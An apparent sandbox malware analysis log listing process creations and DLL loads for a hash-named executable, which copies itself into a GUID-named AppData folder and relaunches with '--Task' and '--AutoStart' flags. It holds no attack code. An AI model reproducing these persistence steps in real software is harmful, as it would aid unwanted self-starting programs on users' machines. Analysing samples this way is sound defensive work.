          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: ntvdm64.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: drprov.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winsta.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntlanman.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: davclnt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: davhlpr.dll
